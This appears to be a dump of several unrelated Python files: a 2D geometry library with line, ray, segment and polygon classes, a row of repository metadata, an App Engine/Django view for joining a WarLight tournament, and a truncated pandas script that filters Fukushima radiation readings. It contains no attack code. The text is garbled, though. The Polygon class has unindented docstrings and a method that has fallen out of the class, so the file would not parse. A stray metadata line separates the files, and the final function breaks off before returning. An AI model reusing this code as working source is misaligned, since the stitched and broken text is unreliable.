        """The `Line` is defined by 2 points so its length is 2."""
        return 2

    @staticmethod
    def is_line_like(obj):
        """
        Check if an object is `Line`-like, for fast computations (not
        necessary to build lines).

        Parameters
        ----------
        obj : anything
            Line-like means exactly of type `Line` (i.e. not `Ray` nor
            `Segment`), or a pair of point-likes such as ((0, 1), (3, 2))
            or [[0, 2], [3, 2]] (combinations allowed).

        Returns
        -------
        res : {True, False}
        """
        if type(obj) == Line:
            return True
        # BUG FIX: the original called len() on obj and on its items
        # unconditionally, raising TypeError for numbers, Points etc.
        # instead of answering False
        try:
            return len(obj) == 2 and all(len(item) == 2 for item in obj)
        except TypeError:
            return False

    def intersection(self, obj):
        """
        Find if `self` is intersecting the provided object.

        If an intersection is found, the `Point` of intersection is
        returned, except for a few special cases (see notes).

        Parameters
        ----------
        obj : geometric object

        Returns
        -------
        out : {point, scalar, list, None}
            The intersection `Point`; `u.inf` for colinear lines; for a
            `Polygon` a list of ``[intersection_point, side_index]``
            items; `None` when there is no intersection.

        Raises
        ------
        TypeError
            If the argument is not a geometric object.

        Notes
        -----
        * `Line`: when `obj` and `self` are parallel, colinearity is
          checked as well, in which case `u.inf` is returned.
        * `Polygon`: each returned item pairs the intersection point with
          the index of the intersected side; `None` if no side is hit.
        """
        if isinstance(obj, Line):
            self_p1 = Vector(self.p1)
            obj_p1 = Vector(obj.p1)
            # solve obj_p1 + obj.v * t == point on self via 2D cross
            # products
            denominator = self.v.cross(obj.v)
            numerator = (obj_p1 - self_p1).cross(self.v)
            if abs(denominator) < UNCERTAINTY:
                # parallel lines
                if abs(numerator) < UNCERTAINTY:
                    # colinear lines
                    return u.inf
                return None
            # interpolation parameter (t): Vector(obj.p1) + obj.v * t
            t = numerator/denominator
            intersection_point = Point(obj_p1 + obj.v * t)
            if type(obj) is Ray:
                # for a Ray, t is restricted to [0, inf)
                if not (t >= UNCERTAINTY):
                    return None
            if type(obj) is Segment:
                # for a Segment, t must fall inside
                # [0, obj.p1.distance_to(obj.p2)]; obj.v is normalized so
                # t measures arc length along obj
                if not (UNCERTAINTY <= t <= obj.p1.distance_to(obj.p2) - \
                        UNCERTAINTY):
                    return None
            return intersection_point
        if isinstance(obj, Polygon):
            # traverse all the edges; collect [Point, edge_index] items
            intersections = []
            for idx, side in enumerate(obj.edges):
                intersection_point = self.intersection(side)
                if intersection_point is None or \
                   intersection_point == u.inf:
                    continue
                # skip a duplicate hit on the shared vertex of two edges
                if intersections and intersection_point == intersections[-1][0]:
                    continue
                intersections.append([intersection_point, idx])
            # if there are no intersections return the usual None
            return intersections or None
        raise TypeError('Argument needs to be geometric object, but '
                        'got instead: {0}'.format(obj))

    def has(self, point):
        """
        Inspect if `point` (`Point`-like) is part of this `Line`.

        Parameters
        ----------
        point : point-like
            The `Point` to test if it's part of this `Line`.

        Returns
        -------
        ret : {True, False}
            If it's part of this `Line` then return True, else False.

        See also
        --------
        Line.intersection, Ray.has, Segment.has
        """
        # the point lies on the line iff the vector p1 -> point is
        # parallel to the line's direction vector
        vector = Vector(self.p1, point)
        return vector.parallel_to(self)

    def perpendicular_to(self, obj):
        """
        Find out if the provided `Line` (or `Vector`) is perpendicular
        to `self`.

        Returns
        -------
        ret : {True, False}
        """
        if isinstance(obj, Line):
            obj = obj.v
        return self.v.perpendicular_to(obj)

    def parallel_to(self, obj):
        """
        Find out if the provided `Vector` or `Line`-like is parallel
        to `self`.

        Parameters
        ----------
        obj : {vector, line-like}
            The `Vector` or `Line`-like to compare parallelism with.

        Returns
        -------
        ret : {True, False}
        """
        if isinstance(obj, Line):
            obj = obj.v
        return self.v.parallel_to(obj)
class Ray(Line):
    """
    A `Ray` extension on `Line`.

    The only difference is that this has a starting `Point` (`p1`)
    which represents the end of the `Ray` in that direction.

    Parameters
    ----------
    arg1 : point-like
        The passed in parameters can be either two points or a `Point`
        and a `Vector`. For more on `Point`-like see the `Point` class.
    arg2 : {point-like, vector}
        See `arg1`.

    See also
    --------
    Line, Segment, Vector
    """
    def intersection(self, obj):
        """
        Tries to find the `Point` of intersection.

        Same as `Line.intersection`, with the extra constraint that the
        intersection `Point` must lie within the bounds of the `Ray`
        (i.e. not behind `p1`).

        Parameters
        ----------
        obj : geometric object

        Returns
        -------
        out : {geometric object, None}
            `GeometricObject` if intersection is possible, else the
            cases from `Line.intersection`.

        See also
        --------
        Line.intersection, Segment.intersection
        """
        # if obj is a plain (infinite) Line, delegate with the roles
        # swapped so Line.intersection applies this Ray's bound via its
        # type check
        if type(obj) is Line:
            return obj.intersection(self)
        intersections = super(Ray, self).intersection(obj)
        if isinstance(obj, Polygon):
            # keep only the polygon hits that actually lie on the Ray
            if intersections:
                intersections = [item for item in intersections \
                                 if self.has(item[0])]
            return intersections
        if intersections and intersections != u.inf:
            # parameter r of the intersection point along self.v must be
            # non-negative for the point to lie on the Ray
            if abs(self.p1.x - self.p2.x) < UNCERTAINTY:
                # (near-)vertical ray: use y to avoid dividing by ~0
                r = (intersections.y - self.p1.y) / self.v.y
            else:
                r = (intersections.x - self.p1.x) / self.v.x
            if not (r >= UNCERTAINTY):
                return None
        return intersections

    def has(self, point):
        """
        Check if `point` is part of `self`.

        Parameters
        ----------
        point : point-like
            The `Point` to check.

        Returns
        -------
        ret : {True, False}
            `True` if the point is on the `Ray`, else `False`.

        See also
        --------
        Ray.intersection, Line.has, Segment.has
        """
        if super(Ray, self).has(point):
            # the point is on the supporting line; it is on the Ray when
            # its projection onto the direction vector is positive
            p1_to_point = Vector(self.p1, point)
            return p1_to_point * self.v >= UNCERTAINTY
        # BUG FIX: previously fell through returning None; return an
        # explicit boolean as documented (same truthiness as before)
        return False
class Segment(Line):
    """
    An extension on `Line` with a finite `length`.

    Parameters
    ----------
    arg1 : point-like
        The passed in parameters can be either two points or a `Point`
        and a `Vector`. For more on `Point`-like see the `Point` class.
    arg2 : {point-like, vector}
        See `arg1`.

    See also
    --------
    Line, Ray, Vector
    """
    @u.cached_property
    def length(self):
        """
        [scalar] Get the length of the `Segment`, i.e. the distance
        from `self.p1` to `self.p2` (computed once, then cached).
        """
        return self.p1.distance_to(self.p2)

    @u.cached_property
    def bounding_box(self):
        """
        [BoundingBox] Get the `BoundingBox` of `self`.
        """
        return BoundingBox(self)

    def __str__(self):
        return super(Segment, self).__str__(length=self.length)

    def intersection(self, obj):
        """
        Tries to find the `Point` of intersection.

        Same as `Line.intersection`, with the extra constraint that the
        intersection `Point` must lie within the bounds of the
        `Segment`.

        Parameters
        ----------
        obj : geometric object

        Returns
        -------
        out : {geometric object, None}
            `GeometricObject` if intersection is possible, else the
            cases from `Line.intersection`.

        See also
        --------
        Line.intersection, Ray.intersection
        """
        # if obj is a plain (infinite) Line, delegate with the roles
        # swapped so Line.intersection applies this Segment's bounds via
        # its type check
        if type(obj) is Line:
            return obj.intersection(self)
        intersections = super(Segment, self).intersection(obj)
        if isinstance(obj, Polygon):
            # keep only the polygon hits that actually lie on the Segment
            if intersections:
                intersections = [item for item in intersections \
                                 if self.has(item[0])]
            return intersections
        if intersections and intersections != u.inf:
            # parameter r of the intersection point along self.v (arc
            # length, since self.v is normalized) must fall inside the
            # segment
            if abs(self.p1.x - self.p2.x) < UNCERTAINTY:
                # (near-)vertical segment: use y to avoid dividing by ~0
                r = (intersections.y - self.p1.y) / self.v.y
            else:
                r = (intersections.x - self.p1.x) / self.v.x
            if not (UNCERTAINTY <= r <= self.p1.distance_to(self.p2) - \
                    UNCERTAINTY):
                return None
        return intersections

    def has(self, point):
        """
        Check if `point` is part of `self`.

        Parameters
        ----------
        point : point-like
            The point to check.

        Returns
        -------
        ret : {True, False}
            `True` if the point is on the `Segment`, else `False`.

        See also
        --------
        Segment.intersection, Line.has, Ray.has
        """
        if super(Segment, self).has(point):
            # on the supporting line; it is on the segment when the two
            # partial distances add up to (almost exactly) the length
            p1_to_point = self.p1.distance_to(point)
            p2_to_point = self.p2.distance_to(point)
            return p1_to_point + p2_to_point - self.length < UNCERTAINTY
        # BUG FIX: previously fell through returning None; return an
        # explicit boolean as documented (same truthiness as before)
        return False

    def get_point_on_self(self, frac=None):
        """
        Get a point on this `Segment` based on `frac`.

        Parameters
        ----------
        frac : float, optional
            Position of the new `Point` relative to `self.p1`, as a
            fraction of the segment length; must be in the open interval
            (0, 1). If not given, a random position is chosen.

        Returns
        -------
        out : point
            The new `Point`'s position on the `Segment`.

        Raises
        ------
        ValueError
            If `frac` is outside the open interval (0, 1).
        """
        # BUG FIX: `frac = frac or ...` treated an explicit frac=0 as
        # "not given" and silently produced a random point instead of
        # raising the documented ValueError; test for None explicitly
        if frac is None:
            frac = UNCERTAINTY + random.random()*(1 - UNCERTAINTY)
        if not (0 < frac < 1):
            raise ValueError('The argument (frac) cannot be '
                             'outside of the open interval (0, 1), '
                             'got: {0}'.format(frac))
        # displacement relative to the first Point
        dx = (self.p2.x - self.p1.x) * frac
        dy = (self.p2.y - self.p1.y) * frac
        # location of the new Point on the Segment
        return Point(self.p1.x + dx, self.p1.y + dy)
class Polygon(GeometricObject):
"""
A general (closed) `Polygon` class.
The `Polygon` is made out of points (vertices of type
`Point`) and edges (`Segment`). It can be created by
passing a list of `Point`-like objects.
Parameters
----------
vertices : {list/tuple of point-like}
The `list` of `Point`-like objects that make the
`Polygon`. The `self.edges` of the `Polygon` are
automatically created and stored. If the length of the `vertices` list
is < 3 this cannot be a `Polygon` and a `ValueError` will be
raised.
Raises
------
ValueError
In case length of the `vertices` `list` is smaller than 3.
"""
    def __init__(self, vertices):
        """
        Normalize and store the polygon: vertices are forced into
        counterclockwise order, rotated so the lowest (then leftmost)
        vertex comes first, closed by duplicating the first vertex at
        the end, and the edge `Segment`s are precomputed.
        """
        if len(vertices) < 3:
            raise ValueError('List of points cannot have less than 3 '
                             'elements')
        self._vertices = [Point(point) for point in vertices]
        # this is for internal use only
        # first initialize to None so that area property can check for it
        self._diameter = None
        self._width = None
        self._area = None
        # setup self._area at this point (with signs); evaluated for its
        # side effect of filling the cache before the closing vertex is
        # appended below
        self.area
        if self._area < 0:
            # the vertices are in clockwise order so set them
            # in counterclockwise order (reverses the stored list in place)
            self.vertices.reverse()
            # change the sign of the area appropriately
            self._area = -self._area
        # now select the lowest (and left if equal to some other)
        # and make it the first vertex in the Polygon (min() uses
        # Point.__lt__: lowest y, then lowest x)
        lowest_idx = self._vertices.index(min(self._vertices))
        # rotate such that the lowest (and left) most vertex is the first one
        self._vertices = u.rotated(self._vertices, -lowest_idx)
        # and add the first vertex to the list at the end for further processing
        self._vertices += [self._vertices[0]]
        # consecutive vertex pairs become the (closed) edge list
        self._edges = [Segment(p1, p2) for p1, p2 in \
                       zip(self._vertices[:-1],
                           self._vertices[1:])]
    @property
    def vertices(self):
        """
        [list of points] Get the `vertices`.

        NOTE: after construction the list is closed, i.e. it ends with a
        duplicate of the first vertex, so its length is the number of
        distinct vertices + 1.
        """
        return self._vertices
    @property
    def edges(self):
        """
        [list of segments] Get the `edges` (one `Segment` per pair of
        consecutive vertices).

        The `Polygon` is closed: the last segment joins the final
        distinct vertex back to the first one.
        """
        return self._edges
    @property
    def area(self):
        """
        [scalar] Get the (positive) area of this `Polygon`.

        Uses the shoelace formula [WPolygon]_:

        .. math::
            A = \\frac{1}{2} \\sum_{i=0}^{n-1} (x_iy_{i+1} - x_{i+1}y_i)

        The signed value is cached in `self._area` on first access; the
        constructor triggers this *before* the closing duplicate vertex
        is appended, so the explicit close below is needed. The property
        always returns the absolute value.
        """
        # first add the first vertex to the list (close the ring); only
        # computed once -- afterwards the cached signed value is reused
        if self._area is None:
            vertices = self.vertices + [self.vertices[0]]
            self._area = 1/2. * sum([v1.x*v2.y - v2.x*v1.y for v1, v2 in \
                                     zip(vertices[:-1], vertices[1:])
                                     ])
        return abs(self._area)
    @u.cached_property
    def bounding_box(self):
        """
        [BoundingBox] Get the `BoundingBox` of `self` (computed on
        first access, then cached by `u.cached_property`).
        """
        return BoundingBox(self)
    @property
    def bbox_width(self):
        """
        [scalar] Get `self.bounding_box.width`. Convenience shortcut.
        """
        return self.bounding_box.width
    @property
    def bbox_height(self):
        """
        [scalar] Get `self.bounding_box.height`. Convenience shortcut.
        """
        return self.bounding_box.height
    @property
    def diameter(self):
        """
        [scalar] Get the `diameter` of the `Polygon`.

        The diameter/width pair is computed lazily; a single call to
        `_compute_diameter_width` fills both caches.

        See also
        --------
        Polygon.width, Polygon._compute_diameter_width
        """
        if self._diameter is None:
            self._diameter, self._width = self._compute_diameter_width()
        return self._diameter
    @property
    def width(self):
        """
        [scalar] Get the `width` of the `Polygon`.

        The diameter/width pair is computed lazily; a single call to
        `_compute_diameter_width` fills both caches.

        See also
        --------
        Polygon.diameter, Polygon._compute_diameter_width
        """
        if self._width is None:
            self._diameter, self._width = self._compute_diameter_width()
        return self._width
    @u.cached_property
    def centroid(self):
        """
        [Point] Get the centroid (`Point`) of the `Polygon`.

        Standard centroid formula [WPolygon]_:

        .. math::
            C_x &= \\frac{1}{6A} \\sum_{i=0}^{i=n-1}(x_i + x_{i+1})
            (x_iy_{i+1}-x_{i+1}y_i)

            C_y &= \\frac{1}{6A} \\sum_{i=0}^{i=n-1}(y_i + y_{i+1})
            (x_iy_{i+1}-x_{i+1}y_i)

        where :math:`A` is the signed area `self._area` (made positive by
        the constructor, which also reorders vertices counterclockwise).
        """
        # self.vertices already ends with a duplicate of the first
        # vertex, so appending it again only adds a zero term (v1 == v2)
        # to each sum -- harmless
        vertices = self.vertices + [self.vertices[0]]
        x = 1/(6.*self._area) * \
            sum([(v1.x + v2.x)*(v1.x*v2.y - v2.x*v1.y) for v1, v2 in \
                 zip(vertices[:-1], vertices[1:])])
        y = 1/(6.*self._area) * \
            sum([(v1.y + v2.y)*(v1.x*v2.y - v2.x*v1.y) for v1, v2 in \
                 zip(vertices[:-1], vertices[1:])])
        return Point(x, y)
    def __str__(self):
        # skip the duplicated closing vertex at the end of the list
        return super(Polygon, self).__str__(vertices=[str(v)
                                            for v in self.vertices[:-1]])
    def __getitem__(self, idx):
        """
        Retrieve points (`self.vertices`) by `idx`.

        Parameters
        ----------
        idx : scalar
            The index of the `Point` (`vertex`). Note the stored list
            ends with a duplicate of the first vertex.

        Returns
        -------
        ret : point
            The `vertex` by index.
        """
        return self.vertices[idx]
    def __len__(self):
        """
        The length of the `Polygon` is the length of `self.vertices`.

        NOTE: `vertices` carries the duplicated closing vertex at the
        end, so this is (number of distinct vertices) + 1.
        """
        return len(self.vertices)
    def _compute_diameter_width(self):
        """
        Compute the `diameter` and `width` of the `Polygon`.

        Internal use only. The `diameter` is the length and the `width`
        the width of the minimum-area enclosing rectangle; the
        calculation follows [Arnon1983]_ (a rotating-calipers-style sweep
        over the edges -- TODO confirm against the paper).

        Returns
        -------
        out : (scalar, scalar)
            ``(diameter, width)`` with diameter >= width.
        """
        def distance(xi, yi, xj, yj, m):
            # perpendicular distance between the two parallel lines of
            # slope m through (xi, yi) and (xj, yj)
            bi = yi - m*xi
            bj = yj - m*xj
            return abs(bj - bi)/math.sqrt(m*m+1.)
        v = self.vertices
        # v ends with the duplicated first vertex, hence the -1
        n = len(v) - 1
        j = 0
        for i in range(n):
            # advance j, k, m around the hull to the extreme vertices
            # relative to edge (v[i], v[i+1]); k/m start from the values
            # found for the first edge
            while Vector(v[i], v[i + 1]) * Vector(v[j], v[j + 1]) > 0:
                j = (j + 1) % n
            if i == 0:
                k = j
            while Vector(v[i], v[i + 1]).cross(Vector(v[k], v[k + 1])) > 0:
                k = (k + 1) % n
            if i == 0:
                m = k
            while Vector(v[i], v[i + 1]).dot(Vector(v[m], v[m + 1])) < 0:
                m = (m + 1) % n
            # rectangle extents for this edge orientation; vertical and
            # horizontal edges are special-cased to avoid a 0 or infinite
            # slope in distance()
            if abs(v[i].x - v[i + 1].x) < UNCERTAINTY:
                d1 = abs(v[k].x - v[i].x)
                d2 = abs(v[m].y - v[j].y)
            elif abs(v[i].y - v[i + 1].y) < UNCERTAINTY:
                d1 = abs(v[k].y - v[i].y)
                d2 = abs(v[m].x - v[j].x)
            else:
                s = (v[i + 1].y - v[i].y)/(v[i + 1].x - v[i].x)
                d1 = distance(v[i].x, v[i].y, v[k].x, v[k].y, s)
                d2 = distance(v[j].x, v[j].y, v[m].x, v[m].y, -1./s)
            # keep the dimensions of the smallest-area rectangle so far
            Ai = d1*d2
            if i == 0 or Ai < A:
                A = d1*d2
                res_d1 = d1
                res_d2 = d2
        # diameter is the larger of the two rectangle dimensions
        return (res_d1, res_d2) if res_d1 > res_d2 else (res_d2, res_d1)
    def has(self, point):
        """
        Determine if `point` is inside `Polygon` based on the winding
        number.

        Parameters
        ----------
        point : point-like
            The `point` to test if it's included in `self` or not.

        Returns
        -------
        out : {True, False}
            `True` if the `point` is included in `self` (`wn` > 0), else
            `False` (`wn` == 0).

        Notes
        -----
        Winding number algorithm (C++ implementation):
        http://geomalgorithms.com/a03-_inclusion.html
        """
        # initialize the winding number
        wn = 0
        # be sure to convert point to Point
        point = Point(point)
        # loop through all of the vertices in the polygon (two by two);
        # the stored list is already closed by the duplicated first vertex
        for v1, v2 in zip(self.vertices[:-1], self.vertices[1:]):
            # the asymmetric (strict vs non-strict) comparisons below are
            # deliberate: they ensure each crossing is counted exactly
            # once per the winding-number rules
            if v1.y < point.y:
                if v2.y > point.y:
                    # an upward crossing
                    if point.is_left((v1, v2)) > 0:
                        # point left of edge
                        wn += 1
            else:
                if v2.y <= point.y:
                    # a downward crossing
                    if point.is_left((v1, v2)) < 0:
                        # point right of edge
                        wn -= 1
        # non-zero winding number means "inside"
        return wn > 0
def get_point_on_self(self, edge_no=None, frac=None):
"""
Return a random `Point` on the given `Segment`
defined by `edge_no`.
Parameters
----------
edge_no : int, optional
The index of the `edge` from the edge list. Default is
`edge_no` = 0, which means the calculate on first edge.
frac : float, optional
A number in the open interval (0, 1). The point will be
placed on the edge with the edge number edge_no and
relative to the first point in the specified edge. If
left to default (`None`), a random `Point` will be
returned on the specified edge.
Returns
-------
out : point
The `Point` on this edge (`Segment`).
"""
segment = self.edges[edge_no]
return segment.get_point_on_self(frac)
    def divide(self, obj=None, edge_no=None, frac=None, relative_phi=None,
               drelative_phi=0):
        """
        Divide the `Polygon`.

        Parameters
        ----------
        obj : line-like, optional
            If no `obj` is given then `edge_no` is used to build a `Ray`
            from a randomly chosen Point on `self.edges[edge_no]` with
            inward direction and the closest intersection `Point` to
            `Ray.p1` is used to divide the `Polygon` in two, else all
            of the points given by the intersection between the
            `Polygon` and `obj` are used to split the
            `Polygon` in any number of polygons.
        edge_no : int, optional
            If given, `self.edges[edge_no]` will be used to build a
            `Ray` as explained above, else a random edge number will
            be chosen.
        frac : float, optional
            If given the point on `self.edges[edge_no]` will be situated at
            the fraction `frac` between `self.edges[edge_no].p1` and
            `self.edges[edge_no].p2` relative to p1. Must be in the open
            interval (0, 1).
        relative_phi : float, optional
            Is an angle (in degrees) that gives the direction of the
            `Ray` spawned from `self.edges[edge_no]`. It has to be in
            the open interval (0, 90). If not given a random direction will be
            chosen in the interval (0, 90).
        drelative_phi : float, optional
            Is an angle interval centered on `relative_phi` which is used to
            calculate a random relative direction for the `Ray`
            spawned from `self.edges[edge_no]` in the interval `[relative_phi -
            drelative_phi/2, relative_phi + drelative_phi/2)`. If not given
            it's assumed to be 0.

        Returns
        -------
        ret : tuple of size 2
            The first element is a list with the newly created polygons and
            the second element in the tuple is another list with the
            `Segments` that were used to divide the initial `Polygon`
            (ie. the common edge between the newly created polygons). These
            lists can be of length 0 if no division took place.

        See also
        --------
        Polygon.get_point_on_self, Segment.get_point_on_self
        """
        # final list of polygons
        polys = []
        division_segments = []
        input_obj = obj
        if input_obj:
            # if a Line-like is given then calculate the intersection
            # Points with all the edges for later use
            intersections = input_obj.intersection(self)
        else:
            # WARNING:
            # -------
            # This only works for non intersecting Polygons
            # select a random edge number and get a random Point
            # on that edge to create a random Ray. This is used
            # to build an intersection Points list with only two points:
            # the randomly generated Point and the Point closest to
            # the randomly generated one. This works because we are
            # careful to generate a Ray only to the right of the segment
            if edge_no is None:
                edge_no = random.randint(0, len(self.edges) - 1)
            random_point = self.get_point_on_self(edge_no, frac)
            # generate a random angle to create a Ray which will be pointing
            # always in the right of the selected edge
            edge = self.edges[edge_no]
            if relative_phi and not (0 <= relative_phi + drelative_phi <= 180):
                raise ValueError('This has to hold: 0 <= relateive_phi +'
                                 ' drelative_phi <= 180, but got:'
                                 ' relative_phi={}, drelative_phi={}'
                                 .format(relative_phi, drelative_phi))
            if not relative_phi:
                # no direction requested: any angle in (0, 180) rel. to edge
                phi = edge.phi + math.pi*random.random()
            else:
                phi = edge.phi + math.radians(relative_phi + \
                                              drelative_phi*random.random())
            obj = Ray(random_point, Vector(1, phi, coordinates='polar'))
            intersections = obj.intersection(self)
            # and finally get the randomly generated Point + the first
            # intersection Point in the sorted list
            intersections = [[obj.p1, edge_no], intersections[0]]
            if edge_no > intersections[1][1]:
                # sort by edge_no if necessary
                intersections = [intersections[1], intersections[0]]
        # place the intersection Points in right positions in the new
        # vertex list and replace the edge number with the new location
        # (basically creating a new edge and pointing to that)
        all_vertices = self.vertices[:-1]
        # count is to hold how many vertices we already added in new list
        # so that the edge's number can be appropriately updated
        count = 0
        for item in intersections:
            # the position where the intersection Point will be inserted
            idx = item[1] + count + 1
            item[1] = idx
            if item[0] == self.vertices[idx - count - 1]:
                # if the intersection point coincides with the Point on the
                # Polygon behind the insertion Point then we just skip the
                # intersection Point, but alter the edge number in intersections
                # accordingly
                item[1] -= 1
                continue
            if item[0] == self.vertices[idx - count]:
                # if the intersection point coincides with the Point on the
                # Polygon after the insertion Point then we just skip
                # everything
                continue
            all_vertices.insert(idx, item[0])
            # store the new position
            # increase the counter to account for the addition of the Point
            count += 1
        # sort the Points first from top to bottom (inverse on Y) and
        # from left to right (on X) because this is the way the intersection
        # Points are used in the algorithm
        if abs(obj.p1.x - obj.p2.x) < UNCERTAINTY:
            # find if the `Line`-like is vertical and if so then
            # sort over Y
            intersections.sort(key=lambda item: item[0].y)
        else:
            intersections.sort(key=lambda item: item[0].x)
        # only after creating all_vertices list we can take care of the
        # different cases that we have regarding Segment, Ray etc. usage
        if input_obj:
            if (type(obj) is Segment) and (self.has(obj.p1) and \
                    self.has(obj.p2)):
                # remove first and last Points from intersection list
                # because the Segment has the end Points inside the Polygon
                del (intersections[0], intersections[-1])
            elif (type(obj) is Segment and (self.has(obj.p1) and \
                    not self.has(obj.p2))) or (type(obj) is Ray and \
                    self.has(obj.p1)):
                # remove only the point closest to obj.p1 since this point is
                # inside the Polygon
                if (obj.p1.is_left(obj.p2)):
                    del intersections[0]
                else:
                    del intersections[-1]
            elif (type(obj) is Segment) and (not self.has(obj.p1) and \
                    self.has(obj.p2)):
                # same as before except for obj.p2 now
                if obj.p2.is_left(obj.p1):
                    del intersections[-1]
                else:
                    del intersections[0]
        if intersections is None or len(intersections) < 2:
            # if we have less than two intersection Points there is nothing
            # to divide: return the (empty) lists unchanged
            return polys, division_segments
        # make separate lists for intersection Points and edges' number for
        # further processing
        intersection_points, edge_nos = map(list, zip(*intersections))
        # keep track of used slices
        slice_to_del = []
        # loop over the edge_nos two at a time to construct Polygons
        # determined by the intersection Points and contained within these
        # then store the slice to be removed, ie. the portion of all_vertices
        # without the intersection Points. Example:
        # * if we have a polygon defined by [p0, i0, p1, i1, p2, p3]
        # * then edge_nos must be: [1, 3] (not necessarily in this order)
        # * first get the Polygon defined by [i0, p1, i1] then remove these
        # * Points from the list and we end up with the remaining Polygon
        # * [p0, i0, i1, p2, p3]
        for i, j in zip(edge_nos[:-1:2], edge_nos[1::2]):
            if i > j:
                i, j = j, i
            polys.append(Polygon(all_vertices[i:j+1]))
            division_segments.append(Segment(all_vertices[i], all_vertices[j]))
            # insert always at the beginning because we have to delete them
            # in inverse order so that the slices make sense when selecting
            # the items from the list
            slice_to_del.insert(0, slice(i+1, j))
        for sl in slice_to_del:
            del all_vertices[sl]
        # here append the remaining Polygon
        polys.append(Polygon(all_vertices))
        return polys, division_segments
UTF-8
Python
false
false
2,014
5,033,701,708,377
3379b93ddead581b484415e1d00cbbd4229f7d90
bb4beabace9d6ca3aa1fa281706e340a955cb493
/join.py
dad207e76eea4421b698c4d6f15329b39a40ad18
[]
no_license
osbert-lancaster-v/CLOT
https://github.com/osbert-lancaster-v/CLOT
a59e2caf2853f3e72913ef1a380a52ed9133c47a
46c31eb11ed3fd78c9b07c74d0e0ddb8328ad475
refs/heads/master
2020-12-25T05:34:34.010997
2013-01-14T18:47:31
2013-01-14T18:47:31
7,272,240
0
1
null
null
null
null
null
null
null
null
null
null
null
null
null
import os
from google.appengine.ext import db
from google.appengine.ext.db import djangoforms
import django
from django.utils import simplejson as json
import logging
from django import http
from django import shortcuts
from django import newforms as forms
import main
import players
##from django.utils.encoding import smart_str, smart_unicode #needed for non-unicode characters
class JoinForm(forms.Form):
    # Form shown on the /join page: the WarLight invite token identifies the
    # player, tourney_id selects the tournament, and tourney_password is only
    # checked when the tournament requires one (see go() below).
    inviteToken = forms.CharField(label="Invite Token")
    tourney_id = forms.CharField(label="tourney_id")
    tourney_password = forms.CharField(label="tourney_password (enter only if it is required)",required=False)
def go(request):
    """Create a player. GET shows a blank form, POST processes it."""
    logging.info('in join.go')
    form = JoinForm(data=request.POST or None)
    #now deal with the form etc
    if not request.POST:
        return shortcuts.render_to_response('join.html', {'form': form})
    if not form.is_valid():
        return shortcuts.render_to_response('join.html', {'form': form})
    #see if we are letting more players join.
    tourney_id = int(form.clean_data['tourney_id'])
    tourney_clotconfig = main.getClotConfig(tourney_id)#.run(batch_size=1000)
    if not tourney_clotconfig:
        form.errors['tourney_id'] = 'tourney_id is invalid.'
        return shortcuts.render_to_response('join.html', {'form': form})
    # Tournament may be closed to new entrants ("gated") or already full.
    players_are_gated_q = False
    if main.arePlayersGated(tourney_id, tourney_clotconfig):
        players_are_gated_q = True
        logging.info('players_are_gated_q = '+str(players_are_gated_q))
        return http.HttpResponseRedirect('/players_are_gated')
    if players.numPlayersParticipating(tourney_id) >= main.getMaximumNumberOfPlayers(tourney_id, tourney_clotconfig):
        logging.info('too many players')
        return http.HttpResponseRedirect('/cannot_join')
    inviteToken = form.clean_data['inviteToken']
    #Call the warlight API to get the name, color, and verify that the invite token is correct
    apiret = main.hitapi('/API/ValidateInviteToken', { 'Token': inviteToken })
    if not "tokenIsValid" in apiret:
        form.errors['inviteToken'] = 'The supplied invite token is invalid. Please ensure you copied it from WarLight.net correctly.'
        return shortcuts.render_to_response('join.html', {'form': form})
    tourney_password = str(form.clean_data['tourney_password'])
    if main.getIfRequirePasswordToJoin(tourney_id, tourney_clotconfig):
        if tourney_password != main.getTourneyPassword(tourney_id, tourney_clotconfig):
            form.errors['tourney_password'] = 'The supplied tourney_password is required but is not correct. Please type the correct password for this tourney.'
            return shortcuts.render_to_response('join.html', {'form': form})
    #Ensure this invite token doesn't already exist
    existing = players.Player.all().filter('inviteToken =', inviteToken).filter("tourney_id =", tourney_id).get()
    if existing:
        #If someone tries to join when they're already in the DB, just set their isParticipating flag back to true
        existing.isParticipating = True
        existing.save()
        return http.HttpResponseRedirect('tourneys/' + str(tourney_id) + '/player/' + str(existing.key().id()))
    data = json.loads(apiret)
    player_name = data['name']
    if type(data['name']) is unicode:
        logging.info('dealing with unicode player name ...')
        player_name = player_name.encode('ascii','ignore') #this deals with special characters that would mess up our code, by removing them.
        logging.info('player_name:')
        logging.info(player_name)
        logging.info('player-name looks ok or not?')
    player = players.Player(inviteToken=inviteToken, name=player_name, color=data['color'], isMember=data['isMember'].lower() == 'true')
    if main.getIsMembersOnly(tourney_id, tourney_clotconfig) and not player.isMember:
        form.errors['inviteToken'] = 'This site only allows members to join. See the Membership tab on WarLight.net for information about memberships.'
        return shortcuts.render_to_response('join.html', {'form': form})
    # put() first so the datastore assigns the key we mirror into player_id.
    player.put()
    player.player_id = str(player.key().id())
    player.tourney_id = tourney_id
    player.save()
    logging.info("Created player")
    logging.info(player)
    return http.HttpResponseRedirect('tourneys/' + str(tourney_id) + '/player/' + str(player.key().id()))
#def join_Redirect
import os
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
from scipy import stats
import statsmodels.api as sm
import scipy, scipy.stats
from sklearn.cluster import KMeans
def getData(original_filename, modified_filename):
    """Load the filtered radiation measurements, caching them on disk.

    When *modified_filename* already exists it is read back directly;
    otherwise *original_filename* is streamed in 10k-row chunks, reduced
    to the March 2012 readings taken within 100 km of the Fukushima
    Daiichi plant, written to *modified_filename* and returned.
    """
    if os.path.isfile(modified_filename):
        # Cached copy from a previous run -- skip the expensive filtering.
        return pd.read_csv(modified_filename)
    chunks = pd.read_csv(original_filename, iterator=True, chunksize=10000)
    # Keep only the readings captured between dates 03-01-2012 and 03-31-2012
    # (plain string comparison works because the timestamps are ISO-formatted).
    march = [
        chunk[(chunk['Captured Time'] > '2012-03-01') & (chunk['Captured Time'] < '2012-03-31')]
        for chunk in chunks
    ]
    df = pd.concat(march)
    # Restrict to measurements within 100 km of the Fukushima Daiichi plant.
    df['Distance To Fukushima in Km'] = df.apply(distanceToF, axis=1)
    df = df[df['Distance To Fukushima in Km'] <= 100]
    # Persist the reduced frame so the next run takes the fast path above.
    df.to_csv(modified_filename)
    return df
def distanceToF(x):
    """Great-circle distance in km from row *x* to the Fukushima Daiichi plant.

    Applies the haversine formula to the row's 'Latitude' and 'Longitude'
    columns against the fixed plant coordinates (37.421003, 141.033206).
    """
    earth_radius_km = 6373.0
    plant_lat = np.radians(37.421003)
    plant_lon = np.radians(141.033206)
    lat = np.radians(x['Latitude'])
    lon = np.radians(x['Longitude'])
    half_dlat = (lat - plant_lat) / 2
    half_dlon = (lon - plant_lon) / 2
